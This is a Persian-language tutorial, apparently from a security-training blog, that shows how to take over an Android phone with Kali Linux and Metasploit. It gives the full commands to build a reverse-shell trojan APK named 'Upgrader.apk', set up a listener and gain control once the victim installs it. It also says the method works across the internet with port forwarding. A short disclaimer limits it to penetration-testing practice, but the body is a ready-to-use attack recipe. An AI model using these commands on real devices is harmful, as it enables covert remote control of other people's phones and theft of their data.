اندروید را با کالی لینوکس هک کنید

به سری آموزش های تست نفوذ آکادمی امنیت اطلاعات ایران خوش آمدید. در این مقاله قصد تست نفوذ به دستگاه اندرویدی را داریم که در محیط کالی بوسیله متااسپلویت انجام می شود. پس آماده باشید تا اندروید را با کالی لینوکس هک کنید…

هدف از این آموزش تمرین تست نفوذ و آشنایی با راه های نفوذ در اندروید است، به هیچ وجه برای اهداف شخصی و دسترسی به گوشی انجام ندهید. پیشنهاد ما این است که برای امور تست نفوذ اندروید یک لابراتوار کوچک و کم هزینه برای خود تهیه کنید.

هشدار

مرحله اول

کالی را راه اندازی کنید

وارد کالی لینوکس خود شوید و ترمینال را باز کنید تا مراحل ساخت یک فایل  Trojan .apk برای نفوذ را پیش ببریم.

دستور زیر را در ترمینال بنویسید:

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk

LHOST را آدرس IP خود یا سرور برای برقراری ارتباط وارد کنید. در صورت استفاده از آدرس IP خود باید قابلیت Port forwarding را فعال کنید.

این روش نفوذ در تمام تجهیزات اندرویدی در محیط شبکه اینترنت یعنی WAN هم قابل اجرا است. پس بنشینید و آماده باشید تا اندروید را با کالی لینوکس هک کنید.

دستورات وارد شده در ترمینال کالی لینوکس

مرحله دوم

ترمینال دیگری باز کنید

در حالی که صفحه ترمینال بالا باز است، ترمینال دیگری را باز کنید، و کنسول متااسپلویت را با دستور msfconsole اجرا کنید:

نسول متااسپلویت

مرحله سوم

یک Listener برای دریافت اطلاعات تنطیم کنید

بعد از اینکه متااسپلویت لود شد دستور زیر را اجرا کنید

use exploit/multi/handler

محیط ترمینال

در ادامه باید یک (reverse) payload تنظیم کنیم تا ارتباط بین هکر و قربانی برقرار شود، دستور زیر را تایپ کنید:

set payload android/meterpreter/reverse_tcp

برای تنظیم LHOST همان آدرسی که مرحله قبل تنظیم کردید و برای خودتان است را وارد کنید.

set LHOST 192.168.0.4

مرحله چهارم

اکسپلویت کنید

دستور exploit  را تایپ کنید

سپس برای اینکه اندروید را با کالی لینوکس هک کنید باید فایل Upgrader.apk که برنامه متااسپلویت ساخته است را در تلفن اندروید خود اجرا کنید. این فایل در پوشه Root شما ساخته و ذخیره شده است.

نفوذ موفق

بعد از نصب و اجرا در سیستم اندروید میتوانید به وسیله کنسول متااسپلویت خود، کلیه کنترل اندروید را بدست بگیرید.

——————————————HACKED————————————————-


نکته: ممکن است این روش بر انواع مختلف اندروید های جدید که دارای برزورسانی و تقویت سیستم امنیتی و دارای برنامه امنیتی باشند بدرستی کار نکند.

اگر بیشتر در مورد متااسپلویت میخواهید بدانید، مقالات زیر را بخوانید:

متااسپلویت چیست؟ مقاله ای کامل در مورد متااسپلویت

سایت رسمی متااسپلویت

برچسب:,

مدیریت
مدیریت
از تیم مدیریت سایت هستم و شیفته‌ی علم امنیت

ممکن است همچنین دوست داشته باشید

lnb
راه اندازی آزمایشگاه تست نفوذ برنامه های اندرویدی
۱۸ آذر, ۱۳۹۹
spider_foot_bg
موجودی بیت کوین طرف مقابل را ببینید
۵ آذر, ۱۳۹۹
kali
10 کار مهم که بعد از نصب کالی باید انجام دهید
۴ آذر, ۱۳۹۹

نظر بدهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

تمامی ترافیک این پایگاه نیم بها میباشد و کلیه حقوق برای آکادمی محفوظ است.